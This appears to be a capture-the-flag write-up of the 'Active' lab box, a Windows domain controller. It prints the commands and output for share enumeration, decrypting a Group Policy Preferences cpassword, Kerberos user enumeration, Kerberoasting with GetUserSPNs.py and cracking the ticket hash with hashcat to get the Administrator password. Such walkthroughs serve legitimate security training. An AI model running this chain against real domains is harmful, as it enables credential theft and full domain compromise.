One of the first boxes that I did that actually requires me to attack Active Directory components (hence the name). Really learned a lot of new techniques. Lets jump in!
Enumeration
As always, we start with our default nmap scan:
[bash]
nmap -sC -sV -p- -oA initial 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-02 18:13 UTC
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-08-02 18:13:42
|_ start_date: 2018-08-02 09:21:01
[/bash]
Wow, thats a lot of services running. Lets see, what do we have:
- DNS on port 53
- LDAP on port 389/3268 (servicing the active.htb domain)
- Something on port 445 (I suspect SMB)
- Some HTTP services on port 593/47001
- Lots of Remote Procedure Calls
I first focused on the HTTP services, using nikto and gobuster. This did not give me any (usable) results. So I decided to look into port 445, hoping for SMB. I fired up the SMB scanner from Metasploit, to see what we could get:
[bash]
msf auxiliary(scanner/smb/smb2) > info
Name: SMB 2.0 Protocol Detection
Module: auxiliary/scanner/smb/smb2
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm <[email protected]>
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
Description:
Detect systems that support the SMB 2.0 protocol
msf auxiliary(scanner/smb/smb2) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf auxiliary(scanner/smb/smb2) > run
[+] 10.10.10.100:445 – 10.10.10.100 supports SMB 2 [dialect 255.2] and has been online for 9 hours
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/bash]
Yep, its Samba alright. Version 2. So that rules out EternalBlue, like at the Blue machine I posted about before.
I tried enum4linux to get more info, but ended up with all kinds of error messages. I switched to nullinux, which did give me some interesting results
[bash]
python nullinux.py -all 10.10.10.100
Starting nullinux v5.3.0 | 08-03-2018 09:53
[*] Enumerating Shares for: 10.10.10.100
Shares Comments
——————————————-
\\10.10.10.100\ADMIN$ Remote Admin
\\10.10.10.100\C$ Default share
\\10.10.10.100\IPC$
\\10.10.10.100\NETLOGON Logon server share
\\10.10.10.100\Replication
\\10.10.10.100\SYSVOL Logon server share
\\10.10.10.100\Users
[*] Enumerating: \\10.10.10.100\Replication
. D 0 Sat Jul 21 10:37:44 2018
.. D 0 Sat Jul 21 10:37:44 2018
active.htb D 0 Sat Jul 21 10:37:44 2018
[*] Enumerating Domain Information for: 10.10.10.100
[-] Could not attain Domain SID
[*] Enumerating querydispinfo for: 10.10.10.100
[*] Enumerating enumdomusers for: 10.10.10.100
[*] Enumerating LSA for: 10.10.10.100
[*] Performing RID Cycling for: 10.10.10.100
[-] RID Failed: Could not attain Domain SID
[*] Testing 10.10.10.100 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.100
[-] No valid users or groups detected
[/bash]
We have some shares! Awesome. I used Nautilus (the default filebrowser in Kali) to see if I can access these shares. It seems that I can anonymously access the users share. I find our user there: SVC_TGS. Browsing the the desktop gives us the userkey.
Exploitation
While browsing the shares, it seems that I can anonymously access the replication share as well. After browsing for some time, I find a file called groups.xml. While looking into this file, I notice something interesting:
[bash]
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
[/bash]
I’ve never seen this kind of file before, but am immediately interested in the cpassword entry. It seems that cpassword is the result of a bad implementation of password management by Microsoft, which was fixed with a patch way back. However, this patch only prevents you from creating new policies and does not remove the old ones. I found a great explanation on the topic here and here. ADsecurity.org is an amazing site on AD-security! It seems that there are multiple tools out there for decrypting this kind of password. I used ggp-decrypt and gppredecrypt.py, both give the same result.
[bash]
python Gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
[/bash]
We have the password! Nice. But where to use it…
Privilege Escalation
Looking back at the initial nmap scan, I do see some Kerberos in there as well. This made me thing of Kerberoasting. Lets see what we can find on this. I fire up Metasploit again:
[bash]
msf auxiliary(gather/kerberos_enumusers) > info
Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Matt Byrne <[email protected]>
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
DOMAIN active.htb yes The Domain Eg: demo.local
RHOST 10.10.10.100 yes The target address
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt yes Files containing usernames, one per line
Description:
This module will enumerate valid Domain Users via Kerberos from an
unauthenticated perspective. It utilizes the different responses
returned by the service for valid and invalid users.
References:
CVE: Not available
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
msf auxiliary(gather/kerberos_enumusers) > run
[*] Validating options…
[*] Using domain: ACTIVE.HTB…
[*] 10.10.10.100:88 – Testing User: "root"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "root" does not exist
[*] 10.10.10.100:88 – Testing User: "admin"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "admin" does not exist
[*] 10.10.10.100:88 – Testing User: "test"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "test" does not exist
[*] 10.10.10.100:88 – Testing User: "guest"…
[*] 10.10.10.100:88 – KDC_ERR_CLIENT_REVOKED – Clients credentials have been revoked
[-] 10.10.10.100:88 – User: "guest" account disabled or locked out
[*] 10.10.10.100:88 – Testing User: "info"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "info" does not exist
[*] 10.10.10.100:88 – Testing User: "adm"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "adm" does not exist
[*] 10.10.10.100:88 – Testing User: "mysql"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "mysql" does not exist
[*] 10.10.10.100:88 – Testing User: "user"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "user" does not exist
[*] 10.10.10.100:88 – Testing User: "administrator"…
[*] 10.10.10.100:88 – KDC_ERR_PREAUTH_REQUIRED – Additional pre-authentication required
[+] 10.10.10.100:88 – User: "administrator" is present
[/bash]
So there is an Administrator account. I then realized that I could have used impacket all this time. Lets see if we can get some hashes for the administrator user. I use the password cracked from cpassword to authenticate to the domain:
[bash]
python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev – Copyright 2002-2018 Core Security Technologies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
——————– ————- ——————————————————– ——————- ——————-
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40 2018-07-30 17:17:40
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7a5631b150c67e6c40a4eaae2e600139$e0e88d46194f9f78d2c664442ccefe04b76b6e813314d5f7d36b8ac4a873015b556ca98117725a91583
[/bash]
We have the hash. Time to fire up hashcat.
[bash]
hashcat -m 13100 -a 0 administrator_hash.txt /usr/share/wordlists/rockyou.txt –force
hashcat (v4.1.0) starting…
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Xeon E312xx (Sandy Bridge), 2048/5931 MB allocatable, 8MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes…..: 139921507
* Keyspace..: 14344385
* Runtime…: 5 secs
Session……….: hashcat
Status………..: Running
Hash.Type……..: Kerberos 5 TGS-REP etype 23
Hash.Target……: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4…0a76cb
Time.Started…..: Fri Aug 3 10:38:17 2018 (29 secs)
Time.Estimated…: Fri Aug 3 10:39:14 2018 (28 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.Dev.#1…..: 254.1 kH/s (8.86ms) @ Accel:16 Loops:1 Thr:64 Vec:8
Recovered……..: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress………: 7225344/14344385 (50.37%)
Rejected………: 0/7225344 (0.00%)
Restore.Point….: 7225344/14344385 (50.37%)
Candidates.#1….: jackrayado -> jabo03
HWMon.Dev.#1…..: N/A
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7a5631b150c67e6c40a4eaae2e600139$e0e88d46194f9f78d2c664442ccefe04b76b6e813314d5f7d36b8ac4a873015b556ca98117725a9158311bbb842795da5f494bfeb7ac6a1e31dc0d6c921fa7b89fb69d12d2b7a438257417dd6d73cabe3753dde6a29e133d68339f2a93b848f01073c1fbf430d3d6ea708c417ec8eeac846f46c5f9cda1501460949dc369a190e9399d93aff674d4f3910367a71cf21313598d2d0c22b427b9c0e1b0a7af4731a11b74067432b03697b4f7d96ced9b38cd22ac94c96d730c2dfd65a57a57080ad6b3f9a136307c5462681b23d06b418a0dde475307f828f57f9b8930f5e85bdb42f0661243c453de2aaca0cbdb2f442794f3b675bfd8edd052d6fe41620784a633e1917033fb1a8de83b8ee139d63e878055998a774f86bae4c24eb20ea5f92ba8fac4c11e8e6bd2df75a1ad33735905b8ad3b256e85542b84f5b4ae6999005313440d48b79667bbc84945ac8600627b2aa5d8cfb4f19bd286886281f523a67d59c48d410b61c0be623987a03e8eedfa136c4dcf6eefe06a7d3aa19e12f26a23e315de89b3db75ecba5e4d733809bea11f31bc9de4453c400d096b13aea879494b4c1df19240fd416dd01beabf9a55fda0c5cc251bc5b679d7de14b2392d07eb4bfc27a4626c9f9351a92b2d55591827cee2fa0087ed21fb947ea78a0d178c3c408d098b4b2192b401cfcf3d7d1f4c91307d33b4a617f45677c82cba3f371b9d8e6729b5df17ab292d78b7c19c6bb7505000a33459b2d3bdcee9608caecee2fc965f98a15c6d7eba5071a59e7ced22f2b84117471e2d8a23bbe1a933aa0ab418f71f6b6f3e799bd0c96d3fa855c202d1a2795b6869b48aba75356b337655b07e3be228ca3cf22a25d1b6fd5f2bd5ef62c9a9f920228e8e5bd43b5c581316e4f4384599223283a288649cda963b408893c4fc700d2b377605abdbc4ad63c5138cef45f482cf04bce83b22055cde5982983556426379b47a9055d8d5722f4831d7d5295b5fb18f4b6356b4bfcf4392f6d0725c87067b5846611cad7d61eb5e4424cba6172291f39daca2fc85b960bb1194bb81dc4887ff6f40d4f0280c8e9329244685f81d57c5906ccd3f6d153176ee7541d35ff240f575a06694814a2f34d464f29308d113b625acdfb9f079f457c1366479437819c77c025d5c070ba6b9b4c7b964d6f5d4a50708557f5b919125fc675a0811fcaacc32f7aa7ac71f75b8b5476fbf44777d8a1e33cca17805a45cb90aa291ebf28062890a76cb:Ticketmaster1968
[/bash]
Game, set, match. We got the Administrator password: Ticketmaster1968. Use this password and the Administrator username to browse to the desktop of the Administrator user to get all root key.
In retrospective, I could have also use to following tools/methods:
- Run invoke-kerberoast.ps1 from Powershell Empire to get all the users to start using Bloodhound for reconnaisance.
- Use Pass-The-Hash instead of bruteforcing (not neccessary actually, but could have been nice)